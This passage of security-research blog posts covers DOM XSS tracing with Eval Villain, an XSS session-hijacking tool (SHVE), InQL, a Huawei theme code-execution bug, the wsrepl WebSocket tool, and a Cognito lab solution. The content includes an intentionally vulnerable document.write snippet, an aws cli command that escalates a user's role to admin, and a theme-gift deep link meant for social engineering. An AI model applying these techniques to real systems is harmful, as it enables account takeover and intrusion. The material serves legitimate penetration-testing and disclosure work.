Eval Villain example catching document.write DOM XSS

Notice this page is being loaded from a local file://. The source code is seen below.

<script>
let x = (new URLSearchParams(location.search)).get('x');
x = atob(x);
x = atob(x);
x = JSON.parse(x);
x = x['a'];
x = decodeURI(x);
x = atob(x);
document.write(`Welcome Back ${x}!!!`);
</script>

Even though the page has no web requests, Eval Villain still successfully hooks the user configured sink document.write before the page uses it. There is no race condition.

Also notice that Eval Villain is not just displaying the input of document.write. It correctly highlighted the injection point. The URL parameter x contained an encoded string that hit the sink document.write. Eval Villain figured this out by recursively decoding the URL parameters. Since the parameter was decoded, a encoder function is provided to the user. You can right click, copy message and paste it into the console. Using the encoder function lets you quickly try payloads. Below shows the encoder function being used to inject a marquee tag into the page.

Eval Villain example catching document.write DOM XSS

If you read the previous sections, you know how this all works. Eval Villain is just using a content script to inject its JavaScript into a page. Anything it does, you can do in your own content script. Additionally, you can now use Eval Villain’s source code as your boiler plate code and customize its features for your particular technical challenge.

Step 1.5: A Quick Tip

So lets say you used β€œStep 1” to get a console.trace from an interesting native function. Maybe a URL parameter hit your decodeURI sink and now your tracing back to the URL parsing function. There is a mistake I regularly make in this situation and I want you to do better. When you get a trace, don’t start reading code yet!

Modern web applications often have polyfills and other cruft at the top of the console.trace. For example, the stack trace I get on google search results page starts with functions iAa, ka, c, ng, getAll. Don’t get tunnel vision and start reading ka when getAll is obviously what you want. When you look at getAll, don’t read source! Continue to scan, notice that getAll is a method and it’s sibling are get, set, size, keys, entries and all the other methods listed in the URLSearchParams documentation. We just found multiple custom URL parsers, re-implemented in minified code without actually reading the code. β€œScan” as much as you can, don’t start reading code deeply until you find the right spot or scanning has failed you.

Step 2: Hooking non-native code

Instrumenting native code didn’t result in vulnerabilities. Now you want to instrument the non-native implementation itself. Let me illustrate this with an example.

Let’s say you discovered a URL parser function that returns an object named url_params. This object has all the key value pairs for the URL parameters. We want to monitor access to that object. Doing so could give us a nice list of every URL parameter associated to a URL. We may discover new parameters this way and unlock hidden functionality in the site.

Doing this in JavaScript is not hard. In 16 lines of code we can have a well organized, unique list of URL parameters associated to the appropriate page and saved for easy access in localStorage. We just need to figure out how to paste our code right into the URL parser.

function parseURL() {
    // URL parsing code
    // url_params = {"key": "value", "q": "bar" ...

    // The code you want to add in
    url_params = new Proxy(url_params, {
        __testit: function(a) {
            const loc = 'my_secret_space';
            const urls = JSON.parse(localStorage[loc]||"{}");
            const href = location.protocol + '//' + location.host + location.pathname;
            const s = new Set(urls[href]);
            if (!s.has(a)) {
                urls[href] = Array.from(s.add(a));
                localStorage.setItem(loc, JSON.stringify(urls));
            }
        },
        get: function(a,b,c) {
            this.__testit(b);
            return Reflect.get(...arguments);
        }
    };
    // End of your code

    return url_params;
}

Chrome’s dev tools will let you type your own code into the JavaScript source but I don’t recommend it. At least for me, the added code will disappear on page load. Additionally, it is not easy to manage any instrumentation points this way.

I have a better solution and it’s built into Firefox and Chrome. Take your instrumentation code, surround it with parenthesis, add && false to the end. The above code becomes this:

(url_params = new Proxy(url_params, {
    __testit: function(a) {
        const loc = 'my_secret_space';
        const urls = JSON.parse(localStorage[loc]||"{}");
        const href = location.protocol + '//' + location.host + location.pathname;
        const s = new Set(urls[href]);
        if (!s.has(a)) {
            urls[href] = Array.from(s.add(a));
            localStorage.setItem(loc, JSON.stringify(urls));
        }
    },
    get: function(a,b,c) {
        this.__testit(b);
        return Reflect.get(...arguments);
    }
}) && false

Now right click the line number where you want to add your code, click β€œconditional breakpoint”.

Creating a conditional breakpoint

Paste your code in there. Due to the && false the condition will never be true, so you won’t ever get a breakpoint. The browser will still execute our code and in the scope of function where we inserted the breakpoint. There are no race conditions and the breakpoint will continue to live. It will show up in new tabs when you open the developer tools. You can quickly disable individual instrumentation scripts by just disabling the assisted breakpoint. Or disable all of them by disabling breakpoints or closing the developer tools window.

I used this particular example to show just how far you can go. The instrumented code will save URL parameters, per site, to a local storage entry. At any given page you can auto-populate all known URL parameters into the URL bar by pasting the following code in to the console.

(() => {
const url = location.protocol + '//' + location.host + location.pathname;
const params = JSON.parse(localStorage.getItem("my_secret_space"))[url];
location.href = url + '?' + params.flatMap( x => `${x}=${x}`).join('&');
})()

If you use this often, you can even put the code in a bookmarklet.

Combining Native and Non-Native Instrumentation

Nothing says we can’t use native and non-native functions at the same time. You can use a content script to implement big fancy codebases. Export that functionality to the global scope and then use it in a conditional breakpoint.

This brings us to the latest feature of Eval Villain. Your conditional can make use of Eval Villains recursive decoding feature. In the pop-up menu click β€œconfigure” and go to the β€œglobals” section. Ensure the β€œsourcer” line is enabled and click save.

Show the new sourcer feature enabled in Eval Villain

I find myself enabling/disabling this feature often, so there is a second β€œenable” flag in the popup menu itself. It’s in the β€œenable/disable” menu as β€œUser Sources”. This causes Eval Villain to export the evSourcer function to the global name scope. This will add any arbitrary object to the list of recursively decoded sources.

Console showing evSource's use

As can be seen, the first argument is what you name the source. The second is the actual object you want to search sinks. Unless there is a custom encoding that Eval Villain does not understand you can just put this in raw. There is an optional third argument that will cause the sourcer to console.debug every time it’s invoked. This function returns false, so you can use it as a conditional breakpoint anywhere. For example, you can add this as a conditional breakpoint that only runs in the post message handler of interest, when receiving messages from a particular origin as a means of finding if any part of a message will hit a DOM XSS sink. Using this in the right place can alleviate SOP restrictions placed on your instrumentation code.

Just like the evSourcer there is an evSinker. I rarely use this, so there is no β€œenable/disable” entry for this in the popup menu. It accepts a sink name and a list of arguments and just acts like your own sink. It also returns false so it can easily be used in conditional breakpoints.

Console showing evSinker's use

Conclusion

Writing your own instrumentation is a powerful skill for vulnerability research. Sometimes, it only takes a couple of lines of JavaScript to tame a giant gully codebase. By knowing how this works, you can have better insight into what tools like Eval Villain and DOM invader can and can’t do. Whenever necessary, you can also adapt your own code when a tool comes up short.

Introducing Session Hijacking Visual Exploitation (SHVE): An Innovative Open-Source Tool for XSS Exploitation

SHVE-logo

Greetings, folks! Today, we’re thrilled to introduce you to our latest tool: Session Hijacking Visual Exploitation, or SHVE. This open-source tool, now available on our GitHub, offers a novel way to hijack a victim’s browser sessions, utilizing them as a visual proxy after hooking via an XSS or a malicious webpage. While some exploitation frameworks, such as BeEF, do provide hooking features, they don’t allow remote visual interactions.

SHVE’s interaction with a victim’s browser in the security context of the user relies on a comprehensive design incorporating multiple elements. These components, each fulfilling a specific function, form a complex, interconnected system that allows a precise and controlled session hijacking. Let’s take a closer look at each of them:

  • VictimServer: This component serves the malicious JavaScript. Furthermore, it establishes a WebSocket connection to the hooked browsers, facilitating the transmission of commands from the server to the victim’s browser.

  • AttackerServer: This is the connection point for the attacker client. It supplies all the necessary information to the attacker, such as the details of the different hooked sessions.

  • Proxy: When the client enters Visual or Interactive mode, it connects to this proxy. The proxy, in turn, uses functionalities provided by the VictimServer to conduct all requests through the hooked browser.

SHVE-architecture

The tool comes with two distinctive modes - Visual and Interactive - for versatile usage.

  • Visual Mode: The tool provides a real-time view of the victim’s activities. This is particularly useful when exploiting an XSS, as it allows the attacker to witness the victim’s interactions that otherwise might be impossible to observe. For instance, if a victim accesses a real-time chat that isn’t stored for later review, the attacker could see this live interaction.

  • Interactive Mode: This mode provides a visual gateway to any specified web application. Since the operations are carried out using the victim’s security context via the hooked browser, detection from the server-side becomes significantly more challenging. Unlike typical XSS or CORS misconfigurations exploitation, there’s no need to steal information like Cookies or Local Storage. Instead, the tool uses XHR requests, ensuring CSRF tokens are automatically sent, as both victim and attacker view the same HTML.

Getting Started

We’ve tried to make the installation process as straightforward as possible. You’ll need to have Node.js and npm installed on your system. After cloning our repository, navigate to the server and client directories to install their respective dependencies. Start the server and client, follow the initial setup steps, and you’re ready to go! For the full installation guide, please refer to the README file.

We’ve recorded a video showcasing these modes and demonstrating how to exploit XSS and CORS misconfigurations using one of the Portswigger’s Web Security Academy labs. Here is how SHVE works:

We look forward to your contributions and insights, and can’t wait to see how you’ll use SHVE in your red team engagements. Happy hacking!

Thanks to Michele Orru and Giuseppe Trotta for their early-stage feedback and ideas.

InQL v5: A Technical Deep Dive

We’re thrilled to pull back the curtain on the latest iteration of our widely-used Burp Suite extension - InQL. Version 5 introduces significant enhancements and upgrades, solidifying its place as an indispensable tool for penetration testers and bug bounty hunters.

InQL v5.0

Introduction

The cybersecurity landscape is in a state of constant flux. As GraphQL adoption surges, the demand for an adaptable, resilient testing tool has become paramount. As leaders in GraphQL security, Doyensec is proud to reveal the most recent iteration of our open-source testing tool - InQL v5.x. This isn’t merely an update; it’s a comprehensive revamp designed to augment your GraphQL testing abilities.

The Journey So Far: From Jython to Kotlin

Our journey with InQL started on the Jython platform. However, as time went by, we began to experience the limitations of Jython - chiefly, its lack of support for Python 3, which made it increasingly difficult to find compatible tooling and libraries. It was clear a transition was needed. After careful consideration, we chose Kotlin. Not only is it compatible with Java (which Burp is written in), but it also offers robustness, flexibility, and a thriving developer community.

The Challenges of Converting a Burp Extension Into Kotlin

We opted to include the entire Jython runtime (over 40 MB) within the Kotlin extension to overcome the challenges of reusing the existing Jython code. Although it wasn’t the ideal solution, this approach allowed us to launch the extension as Kotlin, initiate the Jython interpreter, and delegate execution to the older Jython code.

class BurpExtender: IBurpExtender, IExtensionStateListener, BurpExtension {

    private var legacyApi: IBurpExtenderCallbacks? = null
    private var montoya: MontoyaApi? = null

    private var jython: PythonInterpreter? = null
    private var pythonPlugin: PyObject? = null

    // Legacy API gets instantiated first
    override fun registerExtenderCallbacks(callbacks: IBurpExtenderCallbacks) {

        // Save legacy API for the functionality that still relies on it
        legacyApi = callbacks

        // Start embedded Python interpreter session (Jython)
        jython = PythonInterpreter()
    }

    // Montoya API gets instantiated second
    override fun initialize(montoyaApi: MontoyaApi) {
        // The new Montoya API should be used for all of the new functionality in InQL
        montoya = montoyaApi

        // Set the name of the extension
        montoya!!.extension().setName("InQL")

        // Instantiate the legacy Python plugin
        pythonPlugin = legacyPythonPlugin()

        // Pass execution to legacy Python code
        pythonPlugin!!.invoke("registerExtenderCallbacks")
    }

    private fun legacyPythonPlugin(): PyObject {
        // Make sure UTF-8 is used by default
        jython!!.exec("import sys; reload(sys); sys.setdefaultencoding('UTF8')")

        // Pass callbacks received from Burp to Python plugin as a global variable
        jython!!.set("callbacks", legacyApi)
        jython!!.set("montoya", montoya)

        // Instantiate legacy Python plugin
        jython!!.exec("from inql.extender import BurpExtenderPython")
        val legacyPlugin: PyObject = jython!!.eval("BurpExtenderPython(callbacks, montoya)")

        // Delete global after it has been consumed
        jython!!.exec("del callbacks, montoya")

        return legacyPlugin
    }

Sidestepping the need for stickytape

Our switch to Kotlin also solved another problem. Jython extensions in Burp Suite are typically a single .py file, but the complexity of InQL necessitates a multi-file layout. Previously, we used the stickytape library to compress the Python code into a single file. However, stickytape introduced subtle bugs and inhibited access to static files. By making InQL a Kotlin extension, we can now bundle all files into a JAR and access them correctly.

Introducing GQLSpection: The Core of InQL v5.x

A significant milestone in our transition journey involved refactoring the core portion of InQL that handles GraphQL schema parsing. The result is GQLSpection - a standalone library compatible with Python 2/3 and Jython, featuring a convenient CLI interface. We’ve included all GraphQL code examples from the GraphQL specification in our test cases, ensuring comprehensive coverage.

As an added advantage, it also replaces the standalone and CLI modes of the previous InQL version, which were removed to streamline our code base.

GQLSpection

New Features

Our clients rely heavily on cutting-edge technologies. As such, we frequently have the opportunity to engage with real-world GraphQL deployments in many of our projects. This rich exposure has allowed us to understand the challenges InQL users face and the requirements they have, enabling us to decide which features to implement. In response to these insights, we’ve introduced several significant features in InQL v5.0 to support more effective and efficient audits and investigations.

Points of Interest

One standout feature in this version is β€˜Points of Interest’. Powered by GQLSpection and with the initial implementation contributed by @schoobydrew, this is essentially a keyword scan equipped with several customizable presets.

Points of Interest settings

The Points of Interest scan proves exceptionally useful when analyzing extensive schemas with over 50 queries/mutations and thousands of fields. It produces reports in both human-readable text and JSON format, providing a high-level overview of the vast schemas often found in modern apps, and aiding pentesters in swiftly identifying sensitive data or dangerous functionality within the schema.

Points of Interest results

Improved Logging

One of my frustrations with earlier versions of the tool was the lack of useful error messages when the parser broke on real-world schemas. So, I introduced configurable logging. This, coupled with the fact that parsing functionality is now handled by GQLSpection, has made InQL v5.0 much more reliable and user-friendly.

In-line Annotations

Another important addition to InQL are the annotations. Prior to this, InQL only generated the bare minimum query, necessitating the use of other tools to deduce the correct input format, expected values, etc. However, with the addition of inline comments populated with content from β€˜description’ fields from the GraphQL schema or type annotations, InQL v5.0 has become much more of a standalone tool.

Annotations

There is a trade-off here: while the extensive annotations make InQL more usable, they can sometimes make it hard to comprehend and navigate. We’re looking at solutions for future releases to dynamically limit the display of annotations.

The Future of InQL and GraphQL Security

Our roadmap for InQL is ambitious. Having said that, we are committed to reintroduce features like GraphiQL and Circular Relationship Detection, achieving full feature parity with v4.

As GraphQL continues to grow, ensuring robust security is crucial. InQL’s future involves addressing niche GraphQL features that are often overlooked and improving upon existing pentesting tools. We look forward to sharing more developments with the community.

InQL: A Great Project for Students and Contributors

InQL is not just a tool, it’s a project – a project that invites the contributions of those who are passionate about cybersecurity. We’re actively seeking students and developers who would like to contribute to InQL or do GraphQL-adjacent security research. This is an opportunity to work with experts in GraphQL security, and play a part in shaping the future of InQL.

DoyensecInQL

Conclusion

InQL v5.x is the result of relentless work and an unwavering commitment to enhancing GraphQL security. We urge all pentesters, bug hunters, and cybersecurity enthusiasts working with GraphQL to try out this new release. If you’ve tried InQL in the past and are looking forward to enhancements, v5.0 will not disappoint.

At Doyensec, we’re not just developing a tool, we’re pushing the boundaries of what’s possible in GraphQL security. We invite you to join us on this journey, whether as a user, contributor, or intern.

Happy Hacking!

Huawei Theme Manager Arbitrary Code Execution

Back in 2019, we were lucky enough to take part in the newly-launched Huawei mobile bug bounty. For that, we decided to research Huawei’s Themes.

The Themes Manager allows custom themes on EMUI devices to stylize preferences, and the customization of lock screens, wallpapers and icons. Processes capable of making these types of system-wide changes need to have elevated privileges, making them valuable targets for research as well as exploitation.

Background

When it comes to implementing a lockscreen on EMUI, there were three possible engines used:

  • com.ibimuyu.lockscreen
  • com.vlife.huawei.emuilock
  • com.huawei.ucdlockscreen

When installing a theme, the SystemUI.apk verifies the signature of the application attempting to make these changes against a hardcoded list of trusted ones. From what we observed, this process seems to have been implemented properly, with no clear way to bypass the signature checks.

That said, we discovered that when com.huawei.ucdlockscreen was used, it loaded additional classes at runtime. The signatures of these classes were not validated properly, nor were they even checked. This presented an opportunity for us to introduce our own code.

Taking a look at the structure of the theme archive files (.hwt), we see that the unlock screen elements are packaged as follows:

Archive Structure

Looking in the unlock directory, we saw the theme.xml file, which is a manifest specifying several properties. These settings included the dynamic unlock engine to use (ucdscreenlock in our case) and an ext.properties file, which allows for dynamic Java code loading from within the theme file.

Let’s look at the file content:

Archive Structure

This instructs the dynamic engine (com.huawei.ucdlockscreen) to load com.huawei.nova.ExtensionJarImpl at runtime from the NOVA6LockScreen2019120501.apk. Since this class is not validated, we can introduce our own code to achieve arbitrary code execution. What makes this even more interesting is that our code will run within a process of a highly privileged application (com.huawei.android.thememanager), as shown below.

Privileged Application List

Utilizing the logcat utility, we can see the dynamic loading process:

Process Logs

This vulnerability was confirmed via direct testing on EMUI 9.1 and 10, but appears to impact the current version of EMUI with some limitations*.

Theme in foreground with logcat in back

Impact

As previously mentioned, this results in arbitrary code execution using the PID of a highly privileged application. In our testing, exploitation resulted in obtaining around 200 Android and Huawei custom permissions. Among those were the permissions listed below which could result in total compromise of the device’s user data, sensitive system data, any credentials entered into the system and the integrity of the system’s environment.

Permissions List

Considering that the application can send intents requiring the huawei.android.permission.HW_SIGNATURE_OR_SYSTEM permission, we believe it is possible to leverage existing system functionalities to obtain system level code execution. Once achieved, this vulnerability has great potential as part of a rooting chain.

Exploitability

This issue can be reliably exploited with no technical impediments. That said, exploitation requires installing a custom theme. To accomplish this remotely, user interaction is required. We can conceive of several plausible social engineering scenarios which could be effective or perhaps use a second vulnerability to force the download and installation of themes. Firstly, it is possible to gift themes to other users, so a compromised trusted contact could be leveraged (or spoofed) to convince a victim to accept and install the malicious theme. As an example, the following URL will open the theme gift page: hwt://www.huawei.com/themes?type=33&id=0&from=AAAA&channelId=BBB

Theme gifting attack flow

Secondly, an attacker could publish a link or QR code pointing to the malicious theme online, then convince a victim into triggering the HwThemeManager application via a deep link using the hwt:// scheme.

To be fair, we must acknowledge that Huawei has a review process in place for new themes and wallpapers, which might limit the use of live themes exploiting this vulnerability.

Partial fix

Huawei released an update for HwThemeManager on February 24, 2022 (internally tracked as HWPSIRT-2019-12158) stating this was resolved. Despite this, we believe the issue was actually resolved in ucdlockscreen.apk (com.huawei.ucdlockscreen version 3 and later).

This is an important distinction, because the latest version of the ucdlockscreen.apk is installed at runtime by HwThemeManager, after applying a theme that requires such an engine. Even on a stock phone (both EMUI 9,10 and latest 12.0.0.149), an attacker with physical access can uninstall the latest version and install the old vulnerable version since it is properly signed by Huawei.

Without further mitigations from Huawei, an attacker with physical access to the device can still leverage this vulnerability to gain system privileged access on even the latest devices.

Further discovery

After a few hours of reverse engineering the fix introduced in the latest version of com.huawei.ucdlockscreen (version 4.6), we discovered an additional bypass impacting the EMUI 9.1 release. This issue doesn’t require physical access and can again trigger the same exploitable condition.

During theme loading, the latest version of com.huawei.ucdlockscreen checks for the presence of a /data/themes/0/unlock/ucdscreenlock/error file. Since all of the files within /data/themes/0/ are copied from the provided theme (.hwt) file they can all be attacker-controlled.

This file is used to check the specific version of the theme. An attacker can simply embed an error file referencing an older version, forcing legacy theme support. When doing so, an attacker would also specify a fictitious package name in the ext.properties file. This combination of changes in the malicious .hwt file bypasses all the required checks - making the issue exploitable again on the latest EMUI9.1, with no physical access required. At the time of our investigation, the other EMUI major versions appear to implement signature validation mechanisms to mitigate this.

Disclosure

This issue was disclosed on Dec 31, 2019 according to the terms of the Huawei Mobile Bug Bounty, and it was addressed by Huawei as described above. Additional research results were reported to Huawei on Sep 1, 2021. Given the time that has elapsed from the original fix and the fact that we believe the issue is no longer remotely exploitable, we have decided to release the details of the vulnerability.

At the time of writing this post (April 28th, 2023), the issue is still exploitable locally on the latest EMUI (12.0.0.149) by force-loading the vulnerable ucdlockscreen.apk. We have decided not to release the vulnerable version of ucdlockscreen.apk as well as the malicious theme proof-of-concept. While the issue is no longer interesting to attackers, it can still benefit the rooting community and facilitate the work of security researchers in identifying issues within Huawei’s EMUI-based devices.

Conclusions

While the vulnerability is technically interesting by itself, there are two security engineering learning lessons here. The biggest takeaway is clearly that while relying on signature validation for authenticating software components can be an effective security measure, it must be thoroughly extended to include any dynamically loaded code. That said, it appears Huawei no longer provides bootloader unlock options (see here) making rooting more complicated and expensive. It remains to be seen if this bug is ever used as part of a chain developed by the rooting community.

A secondary engineering lesson is to ensure that when we design backwards compatibility mechanisms, we should assume that there may be older versions that we want to abandon.

This research was made possible by the Huawei Mobile Phone Bug Bounty Program. We want to thank the Huawei PSIRT for their help in handling this issue, the generous bounty and the openness to disclose the details.

Streamlining Websocket Pentesting with wsrepl

In an era defined by instant gratification, where life zips by quicker than a teenager’s TikTok scroll, WebSockets have evolved into the heartbeat of web applications. They’re the unsung heroes in data streaming and bilateral communication, serving up everything in real-time, because apparently, waiting is so last century.

However, when tasked with pentesting these WebSockets, it feels like you’re juggling flaming torches on a unicycle, atop a tightrope! Existing tools, while proficient in their specific realms, are much like mismatched puzzle pieces – they don’t quite fit together, leaving you to bridge the gaps. Consequently, you find yourself shifting from one tool to another, trying to manage them simultaneously and wishing for a more streamlined approach.

That’s where https://github.com/doyensec/wsrepl comes to the rescue. This tool, the latest addition to Doyensec’s security tools, is designed to simplify auditing of websocket-based apps. wsrepl strikes a much needed balance by offering an interactive REPL interface that’s user-friendly, while also being conveniently easy to automate. With wsrepl, we aim to turn the tide in websocket pentesting, providing a tool that is as efficient as it is intuitive.

The Doyensec Challenge

Once upon a time, we took up an engagement with a client whose web application relied heavily on WebSockets for soft real-time communication. This wasn’t an easy feat. The client had a robust bug bounty policy and had undergone multiple pentests before. Hence, we were fully aware that the lowest hanging fruits were probably plucked. Nevertheless, as true Doyensec warriors (β€˜doyen’ - a term Merriam-Webster describes as β€˜a person considered to be knowledgeable or uniquely skilled as a result of long experience in some field of endeavor’), we were prepared to dig deeper for potential vulnerabilities.

Our primary obstacle was the application’s custom protocol for data streaming. Conventional wisdom among pentesters suggests that the most challenging targets are often the ones most overlooked. Intriguing, isn’t it?

The Quest for the Perfect Tool

The immediate go-to tool for pentesting WebSockets would typically be Burp Suite. While it’s a heavyweight in web pentesting, we found its implementation of WebSockets mirrored HTTP requests a little bit too closely, which didn’t sit well with near-realtime communications.

Sure, it does provide a neat way to get an interactive WS session, but it’s a bit tedious - navigating through β€˜Upgrade: websocket’, hopping between β€˜Repeater’, β€˜Websocket’, β€˜New WebSocket’, filling in details, and altering HTTP/2 to HTTP/1.1. The result is a decent REPL but the process? Not so much.

Initiating a new websocket in Burp

Don’t get me wrong, Burp does have its advantages. Pentesters already have it open most times, it highlights JSON or XML, and integrates well with existing extensions. Despite that, it falls short when you have to automate custom authentication schemes, protocols, connection tracking, or data serialization schemes.

Other tools, like websocketking.com and hoppscotch.io/realtime/websocket, offer easy-to-use and aesthetically pleasing graphical clients within the browser. However, they lack comprehensive options for automation. Tools like websocket-harness and WSSiP bridge the gap between HTTP and WebSockets, which can be useful, but again, they don’t offer an interactive REPL for manual inspection of traffic.

Finally, we landed on websocat, a netcat inspired command line WebSockets client that comes closest to what we had in mind. While it does offer a host of features, it’s predominantly geared towards debugging WebSocket servers, not pentesting.

wsrepl: The WebSockets Pentesting Hero

Enter wsrepl, born out of necessity as our answer to the challenges we faced. It is not just another pentesting tool, but an agile solution that sits comfortably in the middle - offering an interactive REPL experience while also providing simple and convenient path to automation.

Built with Python’s fantastic TUI framework Textual, it enables an accessible experience that is easy to navigate both by mouse and keyboard. That’s just scratching the surface though. Its interoperability with curl’s arguments enables a fluid transition from the Upgrade request in Burp to wsrepl. All it takes is to copy a request through β€˜Copy as curl command’ menu option and replace curl with wsrepl.

Initiating a new WebSocket in wsrepl

On the surface, wsrepl is just like any other tool, showing incoming and outgoing traffic with the added option of sending new messages. The real magic however, is in the details. It leaves nothing to guesswork. Every hexadecimal opcode is shown as per RFC 6455, a feature that could potentially save you from many unnecessary debugging hours.

A lesson learned

Here’s an anecdote to illustrate this point. At the beginning of our engagement with WebSockets, I wasn’t thoroughly familiar with the WebSocket RFC and built my understanding based on what Burp showed me. However, Burp was only displaying text messages, obscuring message opcodes and autonomously handling pings without revealing them in the UI. This partial visibility led to some misconceptions about how WebSockets operate. The developers of the service we were testing seemingly had the same misunderstanding, as they implemented ping traffic using 0x1 - text type messages. This caused confusion and wasted time when my scripts kept losing the connection, even though the traffic appeared to align with my Burp observations.

To avoid similar pitfalls, wsrepl is designed to give you the whole picture, without any hidden corners. Here’s a quick rundown of WebSocket opcodes defined in RFC6544 that you can expect to see in wsrepl:

Opcode Description
0x0 Continuation Frame
0x1 Text Frame
0x2 Binary Frame
0x8 Connection Close
0x9 Ping
0xA Pong (must carry the same payload as the corresponding Ping frame)

Contrary to most WebSocket protocols that mainly use 0x1 type messages, wsrepl accompanies all messages with their opcodes, ensuring full transparency. We’ve intentionally made the decision not to conceal ping traffic by default, although you have the choice to hide them using the --hide-ping-pong option.

Additionally, wsrepl introduces the unique capability of sending β€˜fake’ ping messages, that use the 0x1 message frame. Payloads can be defined with options --ping-0x1-payload and --pong-0x1-payload, and the interval controlled by --ping-0x1-interval. It also supports client-induced ping messages (protocol level, 0x9), even though typically this is done by the server: --ping-interval.

It’s also noteworth that wsrepl incorporates an automatic reconnection feature in case of disconnects. Coupled with granular ping control, these features empower you to initiate long-lasting and stable WebSocket connections, which have proven useful for executing certain attacks.

Automation Made Simple with wsrepl

Moreover, wsrepl is crafted with a primary goal in mind: enabling you to quickly transition into WebSocket automation. To do this, you just need to write a Python plugin, which is pretty straightforward and, unlike Burp, feels quintessentially pythonic.

from wsrepl import Plugin

MESSAGES = [
    "hello",
    "world"
]

class Demo(Plugin):
    """Demo plugin that sends a static list of messages to the server."""
    def init(self):
        self.messages = MESSAGES

It’s Python, so really, the sky’s the limit. For instance, here is how to send a HTTP request to acquire the auth token, and then use it to authenticate with the WebSocket server:

from wsrepl import Plugin
from wsrepl.WSMessage import WSMessage

import json
import requests

class Demo(Plugin):
    """Demo plugin that dynamically acquires authentication token."""
    def init(self):
        # Here we simulate an API request to get a session token by supplying a username and password.
        # For the demo, we're using a dummy endpoint "https://hb.cran.dev/uuid" that returns a UUID.
        # In a real-life scenario, replace this with your own authentication endpoint and provide necessary credentials.
        token = requests.get("https://hb.cran.dev/uuid").json()["uuid"]

        # The acquired session token is then used to populate self.messages with an authentication message.
        # The exact format of this message will depend on your WebSocket server requirements.
        self.messages = [
            json.dumps({
                "auth": "session",
                "sessionId": token
            })
        ]

The plugin system is designed to be as flexible as possible. You can define hooks that are executed at various stages of the WebSocket lifecycle. For instance, you can use on_message_sent to modify messages before they are sent to the server, or on_message_received to parse and extract meaningful data from the server’s responses. The full list of hooks is as follows:

Order of wsrepl hook execution

Customizing the REPL UI

The true triumph of wsrepl lies in its capacity to automate even the most complicated protocols. It is easy to add custom serialization routines, allowing you to focus on the stuff that matters.

Say you’re dealing with a protocol that uses JSON for data serialization, and you’re only interested in a single field within that data structure. wsrepl allows you to hide all the boilerplate, yet preserve the option to retrieve the raw data when necessary.

from wsrepl import Plugin

import json
from wsrepl.WSMessage import WSMessage

class Demo(Plugin):
    async def on_message_sent(self, message: WSMessage) -> None:
        # Grab the original message entered by the user
        original = message.msg

        # Prepare a more complex message structure that our server requires.
        message.msg = json.dumps({
            "type": "message",
            "data": {
                "text": original
            }
        })

        # Short and long versions of the message are used for display purposes in REPL UI.
        # By default they are the same as 'message.msg', but here we modify them for better UX.
        message.short = original
        message.long = message.msg


    async def on_message_received(self, message: WSMessage) -> None:
        # Get the original message received from the server
        original = message.msg

        try:
            # Try to parse the received message and extract meaningful data.
            # The exact structure here will depend on your websocket server's responses.
            message.short = json.loads(original)["data"]["text"]
        except:
            # In case of a parsing error, let's inform the user about it in the history view.
            message.short = "Error: could not parse message"

        # Show the original message when the user focuses on it in the UI.
        message.long = original

In conclusion, wsrepl is designed to make your WebSocket pentesting life easier. It’s the perfect blend of an interactive REPL experience with the ease of automation. It may not be the magical solution to every challenge you’ll face in pentesting WebSockets, but it is a powerful tool in your arsenal. Give it a try and let us know your experiences!

Messing Around With AWS Batch For Privilege Escalations

CloudsecTidbit

From The Previous Episode… Have you solved the CloudSecTidbit Ep. 2 IaC lab?

Solution

The challenge for the AWS Cognito CloudSecTidbit is basically escalating the privileges to admin and reading the internal users list.

The application uses AWS Cognito to issue a session token saved as a cookie with the name aws-cognito-app-access-token.

The JWT is a valid AWS Cognito user token, usable to interact with the service. It is possible to retrieve the current user attributes with the command:

aws cognito-idp get-user --region us-east-1 --access-token <USER_ACCESS_TOKEN>
{
    "Username": "francesco",
    "UserAttributes": [
        {
            "Name": "sub",
            "Value": "5139e6e7-7a37-4e6e-9304-8c32973e4ac0"
        },
        {
            "Name": "email_verified",
            "Value": "true"
        },
        {
            "Name": "name",
            "Value": "francesco"
        },
        {
            "Name": "custom:Role",
            "Value": "user"
        },
        {
            "Name": "email",
            "Value": "[email protected]"
        }
    ]
}

Then, because of the default READ/WRITE permissions on the user attributes, the attacker is able to tamper with the custom:Role attribute and set it to admin:

aws --region us-east-1 cognito-idp update-user-attributes --user-attributes "Name=custom:Role,Value=admin" --access-token <USER_ACCESS_TOKEN>

After that, by refreshing the authenticated tab, the user is now recognized as an admin.

That happens because the vulnerable platform trusts the custom:Role attribute to evaluate the authorization level of the user.

Tidbit No. 3 - Messing around with AWS Batch For Privilege Escalations

Q: What is AWS Batch?

  • A set of batch management capabilities that enable developers, scientists, and engineers to easily and efficiently run hundreds of thousands of batch computing jobs on AWS.

  • AWS Batch dynamically provisions the optimal quantity and type of compute resources (e.g. CPU or memory optimized compute resources) based on the volume and specific resource requirements of the batch jobs submitted.

  • With AWS Batch, there is no need to install and manage batch computing software or server clusters, allowing you to instead focus on analyzing results and solving problems

  • AWS Batch plans, schedules, and executes your batch computing workloads using Amazon EC2 (available with Spot Instances) and AWS compute resources with AWS Fargate or Fargate Spot.

Summarizing the previous points, it is a self-managed and self-scaling scheduler for tasks.

Its main components are:

  • Jobs. The unit of work, they can be shell scripts, executables, or a container image submitted to AWS Batch.

  • Job definitions. They are blueprints for the tasks. It is possible to grant them IAM roles to access AWS resources, set their memory and CPU requirements and even control container properties like environment variables or mount points for persistent storage

  • Job Queues. Submitted jobs are stacked in queues until they are scheduled onto a compute environment. Job queues can be associated with multiple compute environments and configured with different priority values.

  • Compute environments. Sets of managed or unmanaged compute resources that are usable to run jobs. With managed compute environments, you can choose the desired compute type (Fargate, EC2 and EKS) and deeply configure its resources. AWS Batch launches, manages, and terminates compute types as needed. You can also manage your own compute environments, but you’re responsible for setting up and scaling the instances in an Amazon ECS cluster that AWS Batch creates for you.

The scheme below (taken from the AWS documentation) shows the workflow for the service.

After a first look at AWS Batch basics, we can introduce the core differences in the managed compute environment types.

Orchestration Types In Managed Compute Environments

Fargate

AWS Batch jobs can run on AWS Fargate resources. AWS Fargate uses Amazon ECS to run containers and orchestrates their lifecycle.

This configuration fits cases where it is not needed to have control over the host machine running the container task. All the logic is embedded in the task and there is no need to add context from the host machine.

EC2

AWS Batch jobs can run on Amazon EC2 instances. It allows particular instance configurations like:

  • Settings for vCPUs, memory and/or GPU
  • Custom Amazon Machine Image (AMI) with launch templates
  • Custom environment parameters

This configuration fits scenarios where it is necessary to customize and control the containers’ host environment. As example, you may need to mount an Elastic File System (EFS) and share some folders with the running jobs.

EKS

